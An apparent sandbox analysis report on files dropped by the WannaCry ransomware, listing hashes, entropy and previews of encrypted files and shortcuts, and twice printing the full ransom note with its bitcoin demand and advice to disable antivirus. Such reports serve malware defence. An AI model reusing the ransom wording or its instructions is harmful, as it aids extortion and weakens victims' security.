                                                  SHA1:B39B245ACE240D06C0FF2E8B701D7E95E5B39DDA
                                                  SHA-256:D2D1FFA0DEC83C35FBE3A0395B504C098963658F0C7CCBEB7BCCBBA8272D9D3C
                                                  SHA-512:F18AA968F7AB1E3F020FC8262628C69D26F6362EF4AC82E864C5230D5E5048A49BFD6498E85E937B99610E648908AD53978B1AC1B1B7A739D9E19D3C7F04EEA1
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!....:....SW...O..t...+Y.^....q0BX'...6...%YE.ZhqN...].....n59..;.\......J...}...s]....u..k..!.O.?../.AItR...2.2.....e..<..GMyS.q..2...A..;..W....V..Yo.8.....9j....w.(r.=..Y+.l~...IZ.!..q...7...]...*&...nKv1XK.a.D.O.!....%....,Y.,.X.K)...r...q~Ut............O....'..5-Q......k.)]d.m/^.o%>`e.....X.......Lp.....A......HG).u3.v.......L.....J.. .Kn...,..a.l....D{+.......;.........i\Lr~...-....u.|.....hpP....J..P.<..../..d.W.ek.lr..uQ.v.f..^*..4..c./..1%e...V.........E26.&`.<...R.....mX2....&y....xS6}.|......fWC.%r.$ ....~..`.|. .]DRPN7........;.C..g..(.(..KBX...U..Q.}... P...N[.'h....s...:J.9.~n%.2.n.n...>......Y..Q.yD../.1..m.D..?.+.......vX.(.Iq.c.X3.!.,....Ro..o...k..j..U>o.|G...csg ...].{w^.2L.&..m....^..:+.W*L,....Q.N....X.t.s...]...k|..CZ.:....!...-.;^MQ......I..F.......r..s..q........)tH.0Sb..H.0l...1.Q..^}....u.M...YS..j.nR....r>...T...%6...^.....P.>....u.FY..j.:n........rR...w+....g5{....#"_........Z.n.]...{q.?..&.;-.....U..m.U...%

                                                  C:\ProgramData\Microsoft\AppV\Setup\@Please_Read_Me@.txt

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):933
                                                  Entropy (8bit):4.708686542546707
                                                  Encrypted:false
                                                  SSDEEP:24:ptrPzDVR5Gi3OzGm0EigS1xbnrRQhbrW8PNAi0eEprY+Ai75wRZcet:DZD36W3yhvWmMo+S
                                                  MD5:F97D2E6F8D820DBD3B66F21137DE4F09
                                                  SHA1:596799B75B5D60AA9CD45646F68E9C0BD06DF252
                                                  SHA-256:0E5ECE918132A2B1A190906E74BECB8E4CED36EEC9F9D1C70F5DA72AC4C6B92A
                                                  SHA-512:EFDA21D83464A6A32FDEEF93152FFD32A648130754FDD3635F7FF61CC1664F7FC050900F0F871B0DDD3A3846222BF62AB5DF8EED42610A76BE66FFF5F7B4C4C0
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:Q: What's wrong with my files?....A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted... If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!.. Let's start decrypting!....Q: What do I do?....A: First, you need to pay service fees for the decryption... Please send $300 worth of bitcoin to this bitcoin address: 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn.... Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software... Run and follow the instructions! (You may need to disable your antivirus for a while.).. ..Q: How can I trust?....A: Don't worry about decryption... We will decrypt your files surely because nobody will trust us if we cheat users... ....* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window....

                                                  C:\ProgramData\Microsoft\AppV\Setup\@WanaDecryptor@.exe.lnk

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon May 15 07:29:01 2023, mtime=Mon May 15 07:29:01 2023, atime=Fri May 12 00:22:56 2017, length=245760, window=hide
                                                  Category:dropped
                                                  Size (bytes):577
                                                  Entropy (8bit):5.195403137227408
                                                  Encrypted:false
                                                  SSDEEP:12:8BiXpzYNbfIhUV9nzUoBjAzodwSY+GGY+GlmCt:8BzqhEZAS1TGGTGlm
                                                  MD5:AA6944E5A685F01614D23396940EDB50
                                                  SHA1:78E8BF9C092559F147E90E6222715CDF2B094048
                                                  SHA-256:636345AD7C515F5814FE1A1A7F8FD8F416536760B1947739E29DACE712AFA005
                                                  SHA-512:B5F30DF5E81368BE91278EDA05CD9A5C708142818E63130A719E5691022CAB32F5C37F41DEBA8E2B7EDBBD8EA8A67A75E2FF842DE2C3E428CC944E970332449A
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:L..................F.... .....kM......kM.....X.H.................................P.O. .:i.....+00.:...:..,.LB.)...A&...&.......`._....b.M....:..M......t.2......J.. .@WANAD~1.EXE..X......V.C.V.C.....b........................@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.......Z...............-.......Y.............5*.....C:\Users\user\Desktop\@WanaDecryptor@.exe......\.@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.`.......X.......226546..............n4UB.. .|..oT..9.......P..#.....n4UB.. .|..oT..9.......P..#.E.......9...1SPS..mD..pH.H@..=x.....h....H......c-dSA....n.............

                                                  C:\ProgramData\Microsoft\AppV\Setup\OfficeIntegrator.ps1.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):5256
                                                  Entropy (8bit):7.959782532493342
                                                  Encrypted:false
                                                  SSDEEP:96:oqxtCoo3BhaTjfb0qyFp4ID+Um0dcAXkbrjWQHA0ICpOmpf3T0RD0MkwUXH6OUbJ:5tDo3OT3zVUm0iTrjJAqOU3TED0+UXzs
                                                  MD5:E84BFBC74C36656981BC5BCDA510A4E4
                                                  SHA1:D1E316955F8A21ACD199E43A4B4380252550170B
                                                  SHA-256:DB8C1DEE0062E0E884F9E85F8678415E7F7704A0336CA97ECB9420C6CB9DF86E
                                                  SHA-512:C746FEDF674CBCC6A745909E58F737C222CAC3C891666C32A7F2DE0CCDF5CA0E8C4BF66D9B605DAACD522BD146E2F6F8F75118E860778AF51CE7B4CA0D41470A
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!.......a.8f!.uH....d!r..4.eR.a....<.>.0Q..+.5[.a..s?9.l?.PVw.jj&.Q...$..x.?.K7|...?.Y..E.".s......v.0........am.q^E.*....av.YRL...,a6.....k.t.v.^........C.W....{I...0...,.3.(B.t1..N..x.a.O.=. U[C.-..~.....a/.g1RB].o..a.*.B.Qe...TNj.}.6n].C.B.u%.....h.............K7....T..^.K.5...u;.=.....K.-w...."..vf.L..)...*....V...8........h....e.,..#.U.".x..D~a....S.L......2..vOEI.K.Wj...b75..`..%..t:.6.eh.4..d.k...^..b....50.._}.n.*..q..T.....9.x$.....F....r\....9f...#aY..$PJp.kQ.^tz-....)..RrJ.......Iz..g^.uj(.F.l.Zg.8Z..... C#s..Haqh...%...!.Z.&....L..@w.%.9M...q....>....A.\.B....\.xt.hh%.)(..;hL...5..:.B.R....%\u.w.....'..Pz...V!.."..8.*..,0.:1=$..G.H.....P.W.vQ.U.J...i..>..P.}.s..s..H...3)f.......p.[P....?....jC..^X...{=./.mm...u..l...qZ-.{....X......<'.v^..e..t|..y..5..s(..T%v..lr!<e.i]#.O.d...>..!4$...3r,.XY.=."..\1)<w...q..7\.........9q.G.].W..T.....F..<.f.?...i.E"..D.@......h[.J...vJB.S..W......h.h.{a....K..'...Ko..ZbqY.n...k..<h]S

                                                  C:\ProgramData\Microsoft\ClickToRun\ProductReleases\46183AC3-59FF-4B8C-8BF8-6C3D1F20FAC7\en-us.16\stream.x64.en-us.db.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):548472
                                                  Entropy (8bit):7.999642908255512
                                                  Encrypted:true
                                                  SSDEEP:12288:ve+IJa6FfQ3sCMUGT0jk1M3kEiU3qHGnyWkuVWgf8ZUceIyokb:rIJa6Fa1PGT0yM0Q3cGnQWWfZ6N
                                                  MD5:24A40E4AAE4E8F84B9221862B9B84139
                                                  SHA1:4C9E6EC9A4FF08EFFAB0B841DBF868068BAED628
                                                  SHA-256:E3F711AEF9D735E84BCCFBFBE76B19A157502EDE35FC91CA7D594C3B77FE45A1
                                                  SHA-512:B23BDB06FAA83F88D0DEBE477081B07D45232FF06707E697BD9BFDF33A96B3BA6EBBF038473B6495D6CBA9EACF3CFF644B0C50796343318A888F80C4E7999EEA
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!......q.f.Q..=..zKj.KH..F.r....=l.....@.G.9..|...^...lE.....i..&'..p..;y..d./y.r..."O...g1.5@S?..m4.rk.F....B.R........@y...P.1....E...R...|.>....U.%..t..,......x1<T .=...>.j.<(iG.*..+..P...zlJ.....!.y%;}..L.a..p.$t\.OmS.U3H/=...,.)........<..........Q]......A.{....0.b..3.I.D.7..vp,.."......Q.(...B]6.i.W2..U.a.&..C...i..........w.C.[.......*C.l}h..... .Z..8.N.._..."7....~.B..|6.....C.UC.B..@.f.*q...)..-......xY..2T..4...{~n8....q..M$.^...s.^.!....]...N]s.LF.0.5..h..w.Q.^..e..<l5..l;.b$.m.2...u.?......9.....>...T...#...;.E=?.?...}.._[E.=]MK.....qk..q..x~.....).0..h.|.....R...z\.)K.......|.(kd"b?.Y...g.Kp.....S..-1...?..;..}....Y.E"..F.. &N...../l.......=G.<^.h..}..Q...!...9...i...v+..=1..I;..kRJ5sy.f..&..=."`...19.....r.r..!..QXkmg...2..4.\/].}pw.j..O..Vsh`....B..1....J'F...i.K....o+{S..`.2&.....".H.#.!X...h..cz0...r.3..^:}..].{....c{8.... .7..4}.....N....................q..{....9....$....;....[..'K..1.,....D)W......N.......7..V.)........

                                                  C:\ProgramData\Microsoft\ClickToRun\ProductReleases\46183AC3-59FF-4B8C-8BF8-6C3D1F20FAC7\x-none.16\stream.x64.x-none.db.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):2972600
                                                  Entropy (8bit):7.999934370710863
                                                  Encrypted:true
                                                  SSDEEP:49152:ycTIcXzlmw4tX9g2ztG0+15uKEJdLXzHp5VavXF1kldQOYcreW+5:ycsF5dw1REDXzp1jQOYqN+5
                                                  MD5:F8236C42AAE4E3C8FD1D032B18EF85FD
                                                  SHA1:C5385D676A7740C16901B33BCB5AF239AFE7252A
                                                  SHA-256:251669C56783100FB5615F1BD7C5636520CBC7C398A73E080F6B8F6F287C30DD
                                                  SHA-512:EDBDA1C3691415BA9DA7FC599A73DADAE742089FE6D69AAEED2532930F9F07C4238E07C87B16A1E6C95847F11B6A8B8155F232F2337971EB964982FAACECCF4A
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!.....2...:M...<./..g...|..a.H.Nf...[.+N.........K..f.z........K..y.U*..Z.....m..76...s"..@ [.....+'i....CkNMXr.......oB@S....7.1d.2.........y@eq....S....x.Xv...q.{/...z...../<t..X..~>h*.5.........`j...+|..j..Nb....g...xp.Y.6.\.+..e6.sj^..oC.......Z-.....&..QY../K..vs'...N... ....T.Q.^...<.b....t.... ...&b..,..ot..../.6e..j.....!..J..?...p.k..\<8...Rg.ZZ.s&..v'..KY:2..AX{dXq%!2..x.u.OH.,.].S.k......R..N'.k'.E.E1=t!J-1.si.Mc.R..."@.s..p`..VID>....jY:f?...V.....Y'.....s.J....BZ.n.{........]..r.B......dr2X.v0.n.jy.]...i.C.....rQ...5/LY....G.-UFh] ..7.b.M...O\y<..{..@p.k"T...:...-.VR0............%......98.~.w..{F_..X.G60%....*..F$0......=..J..'^.....Z..'i..}.G.5^..?[....o..........(..K..&.>.`.kK..W:..s.....l.......?...*...2.SD._H.#V..._?...I...&B..H..c..R.I^LG.x&.*.}.1...`..4...&..l.O`<...KJ...U<..u...v...Sf...xT..`.E[N2...@g.Wk.jt...D....B.w27...........\...R..s.........\.S.(...;.'2..H....$.5.....:..U2k...'.k...'i$.i^..Q`..f.....n.6.W.

                                                  C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):130040
                                                  Entropy (8bit):7.998423828929835
                                                  Encrypted:true
                                                  SSDEEP:3072:9n1W6/AW7m3TKqlP4iEmKgJ7Fr4txpkJLA32BcI67vL:fWiv7mKeUgpKtxpJy27D
                                                  MD5:7210A5BD2CF42D2DF0F5E93E72A2C684
                                                  SHA1:C6ACC908BF46775A95FCDD229F74797370DCA474
                                                  SHA-256:F20DE54655BD49392DA0E4B0558AF422FCEC375E8D077FB93BD5A2F1F3158196
                                                  SHA-512:0EBA54B444936BEC64505527C7C0938D69E0CBCDF5B7E0A30F60B0FF1A6D7BD37A29DCB7683127E369FA57AD396CE8F0C20D10CE1C96BB5421DE436F2C7BDA4B
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!......:G..:gniZ]..%`c...[....fS`cF.(...F...s.U.+r...b..a.?...@..N.%.....;.#...\.3..C.@5.......&i.....,5(.N=.?...y.;.........Y.T....o...*..w..y...:Q..T...P..-_.P..?..iNVAK..c..46p.6.H.B0.!.. p).y..?...Gqm..p..A;6.B.y{:.....y.6|......)....m...>........k.............4..>a.a.i.,.;..51.g..5<.;.5.I......%....].. 4.' ...{.'.X........t>yn...;c+...8.8s....E.g........Bp....X..<.[.;..*.5>......ve4.B.2.......*.{.U...j...w._.A..PK.'.X.JVf.u.r<WwUF.....a.\:._.q.KC....a.Z.D)l".....Q.cw....k.pNa@...m...._.....:..%..+.._.._C.L.Qj..F.`m|]...Z.&...;:....'s.C.j_.t./ ..qo..O.NGkB......C..P|.......l..*......:....n...$.\]vw79.Z.z.|.J. .2.i..Q.......5k....j.........V..B.q.v...aT...,..t....P,*.....r_ef..W......&...S.Q..."n+^..Q...y..D. [...~.=L.H\...."t.s.D....M.Y.@+...0..kz.~.......A"&..|.eC..%V...B...0..1..1.YIZ...|2.3...Bl.M......{...6....r.@...1......R.0.Y'.[C...*.).y.l.}.....-....tk>E....._...9......."..Oz..<....@:.&F.n..A.Ob..m.F..'_...3O#..w..`U.e...

                                                  C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):44776
                                                  Entropy (8bit):7.996073182271237
                                                  Encrypted:true
                                                  SSDEEP:768:Kk3PaHHH4LJpQngcvLP6b9Jo4tWk14Q+EQPG1XRTTTA7HN1VksnbPV:KmanH41KXCb9JJZvtXRXTaH
                                                  MD5:4340905A0CE34D0A57F243FF37557E3C
                                                  SHA1:C1127BA7090EC1EE1356F4BE18AC711108055157
                                                  SHA-256:BB9E6826049EE66924B114A13D4146B7355D979CB3E49244D9A92DEC425E5958
                                                  SHA-512:108454286064D8866A09226CC826C5B073CC97589D9AA94D129697F57CB0FF3F29FBA65E1303DBA13445D4BA02C8A29F9BB4CE7500BB4D68434230EA57F8987F
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!....;.I&..lQ.R.Nlw.uq.t..z..LlN7..}_.8'.R..X.3..&..<'...n..y4..z"..T..[..g...,.............8.+D..j...Q}...J.;."..7..?I..z./<....4.c.\.X...P4JiW.DI..z9...H#q..rN..D.G.T/.d.ZgO......B....Gb....6I..._...\>....[......6.N..6.c[..De.0 .....r....e.smu2Xy..=..A...........5..B....r.:T.j....rr..q(..I......n..b...(S..Z.g.|.73.."....w..o.$..r..=....p.o..`Ukq..x..~+.>..}.zL../...w7^....1.4...#w...js....A..O..~UC....~..p/...1...l....'.+.R..k....*.N;i...A.....n...q....:k.....B....y.q~.}4.FM.+G.&..v.u.%.m...<}1..&H..(N<H.1.._.....e..F.aNKq..y...J.......X.r.f...\`.;..-.Q.aA.,..{..... ./.-e....G.p;..%.qWe...U.x9....%....3B..W....a#....w..Z7:.._.b....3h'...P.cZ.^#A|=.].;....5..S...s%u.b.i....u|Zn....qa....}.$3..+....ca.~..I..t....QV.C.c...\m...*..H}...>...qL.>.X.Y4&...=...h_..b...O(i.Q...;...&...C...........f?.....O+..aX.o......7..Y&<u..f...(..\%`S..........S3$...{..].%.7..GB........t(..4.F....NRX.}.$};.Z._..9..os.c....a1.>....D5../{.3.......f.

                                                  C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):29160
                                                  Entropy (8bit):7.992258615085787
                                                  Encrypted:true
                                                  SSDEEP:768:eXPZFomakFXccG/DeM7eFEFaxG23ZnjuOaEBLCi4en:gZF5FXHXG25qaOiL
                                                  MD5:69B5C93FB3F3CA427B070F6C6D9259D6
                                                  SHA1:0A689068BE15E04F5E29CBE7A96D913F093DA3A2
                                                  SHA-256:F2788B6EF75B8684E4BED344579DDF1938014A4D143EAB0B76CD4A1C7A8CA1D6
                                                  SHA-512:5DB3F5147743C62BB60302F7C9C8E92A59974BBD848A7C2A2595DB7A86C141E24E7F290882DE4D1336DF52EC63FD50F9EDB99A905FE3219B3AF8AE7491D1798B
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!....&"._...+$..c$..5..6.pL........QH....R...'8U..........H....MdJ..:a..a4..f..m.0.b..F.e.#..`M1n,.[I.L%e....'d....Z...X.q.O...{....3....x3...=.6..E..R..i..X[.m.V..............O.b.S3.LX..r.}..!....x..`{.F..{.e.C....p.....d.IR..........)......?..I......p.......v...&[P.....X..........+..IJ..RL....~f.?+-...Cw.4...+at....M.e...M.+...`.....u.s.@..B.....L..._|)P*..a..%.w.#.-...6..GGu..Lv_.2.. a..DR...SP..'0..Jk.U...`..L..Uu.?.*.....H..EN.5....{g.D./..Q.p.1....zc.....|V.[.....,..O.0.2..V.m....^.+...y..W.z..`......}....c1.0.....] ..1..}....q.~.<.....Nj.cKfaLVs..W....>.CB...zX.w.ZGZ|...2.#......q..JR..?...,q.b.... jI..=..}.E.`Q.+..EG.....#_..9q...o...^gT.EL.^.sP.,..q*...|..O..Bm^..~T.."..|..$..s..0.....L......F..1.R....,P...>m..0xv(U{MT.....M.....\...:8.s...".:.A..zXI..|.Z.e).t..l.]t.(.oN.pG..[.l~i.m$..!..Y..P.x|.N.....bs...>'$...v.D...{...>.......?.,.o.<.._.["......\F..8~#....nq.EVH..]........n....O......M.........Mmf....V....|...C..

                                                  C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):39672
                                                  Entropy (8bit):7.9952889666973075
                                                  Encrypted:true
                                                  SSDEEP:768:d4RRSbMKFyV3R12KCadk4Vgex3opxMHk0INoQ61u2s+0EngrHi:yR4fyv12Idnq2Ypx0UiQ6s2ZZngrHi
                                                  MD5:5288ED3C2FB7ED3EA8A8D717C53FE77A
                                                  SHA1:2E2D6BBFC2688AF3754D5355EA88AF9A6FFA73D2
                                                  SHA-256:9CC214666967FCB55B5B1EB28782E5A25417ADB04617309D95E95834B7E68D89
                                                  SHA-512:6431AD74DC6A3A08FE9732D2DE620FE87AC1695255B404C0756D905AFD623896E27828EB3458CE304298CB1C6E16DBFA0CBAC2175CAB2A13C4864D20E69FA996
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!.....U._..4R..bG....:...I..../.Q..).......4O+.L.^.c.D...7.2..<jQ...I..Xr]..JRk..U.{..?......}.o....Q.E...pV......J...[.}...F..4.... ....:2...XJ8j..>w..&.Nm.....l.Q'J.!s......3pV..]I`.b.0......a..J.......1C2p[d....2..Bwl....ibj.. ....?a|.......z.+.vI..J.............}.>.^....y.N..T..`w&.Sp.V...|.....8...F5i...;GL...X>.&.z..f..h..YS...|...\K.&....*..&R...x..aXd.B..<y.k.....a...C ....ga.T..:z.hV...kNi..,Lz.6..$..[....2X.........'.>.C9.W.P"K.]..Y.X..'.XF.}....{=t........Y.......,y.6/J6......l.tw.i.B.....)..g.s.]A....9U.q...<..?...[o......-.uI:..<.(.......iX..+.L.).6R.E....j}...M.......Q>.v..|.he.......Zv...8...9.!Z.(L.\.!WQ.....h.?.y......a..(@.F.K.d...Lw..3T.......R.e.........^....p...?...Is..OOm..t.. ..a....0.8|sY.........TX7>.;[D.b.YK.#...V."..Y9..)..].....(7..pD...io...T8..Xf....5.R......:1&Y...!../..A.@F5:.s..........xV^...hr.....@0+..4+...L..j.\..@J....d....I...GfD.,.b6...lC.,X...&.`t@e{b...._./4.%.>.._Ym..yQ.......".6d.7..V.h.>.K..a.8.

                                                  C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):130040
                                                  Entropy (8bit):7.9986653638378735
                                                  Encrypted:true
                                                  SSDEEP:3072:lj7Bzllc2gb1LwgT3QebMCMvcZ0c9JBEVFHVFc:l3NcPbagtZFBEVFc
                                                  MD5:62CB0FB09F5BA2C60E0B754DFE6D7528
                                                  SHA1:654F16B6742B75B299AEFF6B6BC3C7AB7D427E03
                                                  SHA-256:FC830722F737976FC0AA8E228609C7C3FCEA0F617EAC5AE98AB1C9DE675AAAA9
                                                  SHA-512:4DCD3C99F62FCA9262EDCEC4930332A030738960007F575DCA75B3DAD6001A2A23E2471447E7E48DF0B8C6515C8363F03F93A44C00BB2F249FB657E7BABBCAE9
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!.....o.X..L.F..)....C..7...[.1.....<&r6.Y.....z.....|.8.1....FT...0.... ...@{..~9CU#..'V..%.G...h.q`(..k.....N#..z....z.'.C.......L.+IN...4.\"...K:`....`.M..+|GI..c.#.v.08.z..U.....'...G....=~.O...1..H....|...zW.JJK\.R.~...m...UW.JQ..A....32.J..@. =.m`Z.o............F...Sl.........u.d..s.....c../.....If..........$N1..M....:..n2................F.Nn..w./V.Gdc1..N.[....IlXj....5EZG....e...@..n......`.V.)Ntt.m.......x....wKD\+q..I'y...e5".._d{..5a........8.:...]/%.\.W.$rf..*...7k.:D<.h....w.#........b..7....9....i...J&...V.A._.I.d..6w....:..s....l.(... Y1c1...0..N.,^.5....B.!n.3...H...H.E..,{>..v.w....s.@.9J.T......e.9;.....5.6.............F..]t.i`.....*,......P....Z..D.'.L...0..b..h7]..[4N.u....L..y.e...]..z.\[.1........+..ZK...(..R....O.u.,e.Sw.m..$..J.....j..3h.....d.).P...M...)...W..u.2.o.....E.....=U......:.,...S....du...!..6+..$..(..8..%...G;.<...nw,......0..........A).Y..`.{.r.4....:.o$n.....xz..C.>....$.V....Y3..lN......=...!..A...

                                                  C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):29160
                                                  Entropy (8bit):7.993650125247031
                                                  Encrypted:true
                                                  SSDEEP:768:pw+mxSR+TG0SVAh3nKQwZ/4q0sOKJMk0MprVYUW2:O+mxSR+TfSVAxqZ/4sOEMkdlVY2
                                                  MD5:6316C2D737FAB580C7253D3AD17CEA76
                                                  SHA1:88C2514EF43C3AF3CADB65EEAFEC9857B41AF480
                                                  SHA-256:9CB8314EFA97A2DE83127033FDF362BFB558DBE14AB9DEBD7CC1F3B8D4D61BB8
                                                  SHA-512:6E6309849B3AF8FCB3AFF60AA3F6FFC7B3B721EC7F7A8ADB0F821A968F0303D65E27230E6698AD0F6D688254B9EB19C930474EA7A05A2915D0A991B0FE629DE0
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!........Oe%.......r.....V.l......4.a.. $.u....J.......7.R..t...a\......!...3...H....r...v..%>.oGXk....C..l.C...w@.R&p...Ks._..RB$.k."G.z'...7.......l.(.....@....E....N|Xb.o........v.JO..y..|!@|:+.........n."..v.I.af.J.].P....H.....W.K.*.f.z.9.h.....p......l.:I....a.(....x.0......{....?Fz.aH.x..h.....b...3.....k...4...{...".An!j...{......&\O.R.>...-..UR.{)[NE.cc...Y.0,.{..g0..b.;.z.&...........k.Q...>c..i...(C.j9.ee..#.[#.'V\..........+.....g...{<A..k.(.?.J...z.:..1.......Y.`..j[..$.....J...3G...}..o...>C.o.c...G.~^..^H.....eI.N..2....]&l.U.`.@..Ff:s.C.O.#..hj/..;.:.u.../.Kn.%.$.g.w..... #~R.M.......9..*H............ E..>....}._i?...p......&(j]..zo......Y.z...?..).._..:9.<.<......~...y{.u...t.r...Z....>d..a@E.+..xp.Q.q.K.kH.2.h[...N..w.z.9....HH8...B|%..r...t2s.f.?.AA.d.&...).......=.n../qE..7....v......<U~.J.....3m.6u......C.v.....9...+/#S"Gr/{..fv`.(...TH.O54a..15@R....p.....rSG`.!..[+L.K%V.!,.*07=.:l.iH~.5N.:.....l[.y.=..H..|..

                                                  C:\ProgramData\Microsoft\Diagnosis\@Please_Read_Me@.txt

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):933
                                                  Entropy (8bit):4.708686542546707
                                                  Encrypted:false
                                                  SSDEEP:24:ptrPzDVR5Gi3OzGm0EigS1xbnrRQhbrW8PNAi0eEprY+Ai75wRZcet:DZD36W3yhvWmMo+S
                                                  MD5:F97D2E6F8D820DBD3B66F21137DE4F09
                                                  SHA1:596799B75B5D60AA9CD45646F68E9C0BD06DF252
                                                  SHA-256:0E5ECE918132A2B1A190906E74BECB8E4CED36EEC9F9D1C70F5DA72AC4C6B92A
                                                  SHA-512:EFDA21D83464A6A32FDEEF93152FFD32A648130754FDD3635F7FF61CC1664F7FC050900F0F871B0DDD3A3846222BF62AB5DF8EED42610A76BE66FFF5F7B4C4C0
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:Q: What's wrong with my files?....A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted... If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!.. Let's start decrypting!....Q: What do I do?....A: First, you need to pay service fees for the decryption... Please send $300 worth of bitcoin to this bitcoin address: 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn.... Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software... Run and follow the instructions! (You may need to disable your antivirus for a while.).. ..Q: How can I trust?....A: Don't worry about decryption... We will decrypt your files surely because nobody will trust us if we cheat users... ....* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window....

                                                  C:\ProgramData\Microsoft\Diagnosis\@WanaDecryptor@.exe.lnk

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon May 15 07:29:01 2023, mtime=Mon May 15 07:29:01 2023, atime=Fri May 12 00:22:56 2017, length=245760, window=hide
                                                  Category:dropped
                                                  Size (bytes):577
                                                  Entropy (8bit):5.195403137227408
                                                  Encrypted:false
                                                  SSDEEP:12:8BiXpzYNbfIhUV9nzUoBjAzodwSY+GGY+GlmCt:8BzqhEZAS1TGGTGlm
                                                  MD5:AA6944E5A685F01614D23396940EDB50
                                                  SHA1:78E8BF9C092559F147E90E6222715CDF2B094048
                                                  SHA-256:636345AD7C515F5814FE1A1A7F8FD8F416536760B1947739E29DACE712AFA005
                                                  SHA-512:B5F30DF5E81368BE91278EDA05CD9A5C708142818E63130A719E5691022CAB32F5C37F41DEBA8E2B7EDBBD8EA8A67A75E2FF842DE2C3E428CC944E970332449A
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:L..................F.... .....kM......kM.....X.H.................................P.O. .:i.....+00.:...:..,.LB.)...A&...&.......`._....b.M....:..M......t.2......J.. .@WANAD~1.EXE..X......V.C.V.C.....b........................@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.......Z...............-.......Y.............5*.....C:\Users\user\Desktop\@WanaDecryptor@.exe......\.@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.`.......X.......226546..............n4UB.. .|..oT..9.......P..#.....n4UB.. .|..oT..9.......P..#.E.......9...1SPS..mD..pH.H@..=x.....h....H......c-dSA....n.............

                                                  C:\ProgramData\Microsoft\Diagnosis\EventStore.db.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):98584
                                                  Entropy (8bit):7.998238822248994
                                                  Encrypted:true
                                                  SSDEEP:1536:3AJD66/4y5LsqtjE6aEvKkEczWGZicYLgrt1mK8tIDTVkNBQKEHOH6X8SpCVwq7:3ot5gS4IvEcznZntuKtVkVElpCX7
                                                  MD5:F183801219DDB0C7B30C43E94BAB5BC6
                                                  SHA1:B1C95371E4C1236251B5A94F926DA4B24CEFBD1E
                                                  SHA-256:5A97FDDE81496DD81C26F5562FCD17DBB63C88401BF9C6E0F29E6D28DA8C4978
